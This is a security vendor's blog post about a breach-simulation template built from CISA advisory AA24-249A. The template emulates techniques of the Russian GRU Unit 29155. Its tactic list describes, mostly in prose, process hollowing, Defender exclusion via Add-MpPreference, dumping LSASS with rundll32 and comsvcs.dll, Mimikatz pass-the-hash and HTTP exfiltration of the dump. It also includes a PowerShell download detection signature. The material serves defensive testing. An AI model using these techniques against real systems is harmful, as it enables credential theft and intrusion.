Response to CISA Advisory (AA24-249A): Russian Military Cyber Actors Target US and Global Critical Infrastructure

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-249A) published on September 5, 2024, that assesses cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. Read More

On September 5, 2024, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA), alongside multiple partners, released a Cybersecurity Advisory (CSA) focused on cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who have been responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020.

GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. The analysis of this destructive payload was initially published in the joint advisory AA22-057A released on February 26, 2022.

FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage, influence operations, and assassination attempts throughout Europe. Unit 29155 expanded its tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data.

AttackIQ has released a new assessment template that includes the post-compromise Tactics, Techniques and Procedures (TTPs) exhibited by Unit 29155 during its latest activities to help customers validate their security controls and their ability to defend against sophisticated threats.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against the behaviors exhibited by a politically motivated threat that continues to conduct worldwide espionage activities.
  • Assess their security posture against activities focused on espionage, sabotage, and destruction.
  • Continuously validate detection and prevention pipelines against a threat that sustains worldwide espionage and sabotage operations.

[CISA AA24-249A] Russian Military Cyber Actors Target US and Global Critical Infrastructure

This assessment template emulates the post-compromise Tactics, Techniques, and Procedures (TTP) exhibited by Unit 29155 during its latest activities.

The assessment template is divided into tactics, grouping the techniques and implementations used by affiliates at each stage of their activities.

1. Execution

Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.

Process Injection: Process Hollowing (T1055.012): This scenario creates a process in a suspended state and unmap its memory, which is then replaced with the contents of a malicious executable. In this way, code execution is masked under a legitimate process.

2. Defense Evasion

Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.

Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Add-MpPreference PowerShell cmdlet to add a directory to the exclusion list in Microsoft Defender.

3. Credential Access

Consists of techniques for stealing credentials like account names and passwords.

OS Credential Dumping: LSASS Memory (T1003.001): This scenario uses rundll32.exe with comsvcs.dll to create a MiniDump export containing a memory dump of the LSASS process. This process contains a variety of credential materials and can passed to additional dumping tools to extract credentials.

Pass the Hash (T1550.002): This scenario uses Mimikatz to dump hashed credentials that will be used to authenticate via NTLM to other enterprise resources.

4. Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

Remote System Discovery (T1018): This scenario uses Nmap to scan the local network searching for any remotely accessible systems.

5. Lateral Movement

Consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain.

Remote Services: SSH (T1021.004): This scenario attempts to open a remote shell and execute commands on target computers using SSH.

6. Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

7. Exfiltration

Consists of techniques that adversaries may use to steal data from your network. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): This scenario compresses a LSASS minidump file and exfiltrates it in un-encrypted HTTP traffic to an external server.

Opportunities to Expand Emulation Capabilities

In addition to the released assessment template, AttackIQ recommends the following existing scenarios to extend the emulation of the capabilities exhibited in this advisory.

  • Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PSExec.
  • Dump SAM hashes with Mimikatz using a Volume Shadow Copy: This scenario retrieves credentials stored in the Security Account Manager (SAM) file using the Volume Shadow Copy Service and Mimikatz.
  • BloodHound Ingestor Execution: This scenario executes a BloodHound ingestor to create a ZIP file containing all the necessary Active Directory data for BloodHound
  • Open Port Checker Using Masscan: This scenario uses Masscan to scan the local network searching for any remotely accessible systems.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

2. Command and Scripting Interpreter: PowerShell (T1059.001):

Adversaries may utilize PowerShell scripts and built-in PowerShell cmdlets to complete their primary objectives.

2a. Detection

Enabling PowerShell script logging is critical to being able to track how PowerShell is being used in your environment. Many actors will obfuscate their code to make it more difficult to detect.

Resources for Enabling PowerShell Logging:

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations:

 3. Ingress Tool Transfer (T1105):

Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

3a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

Wrap-up

In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against this destructive threat. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against sophisticated nation-state actors.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.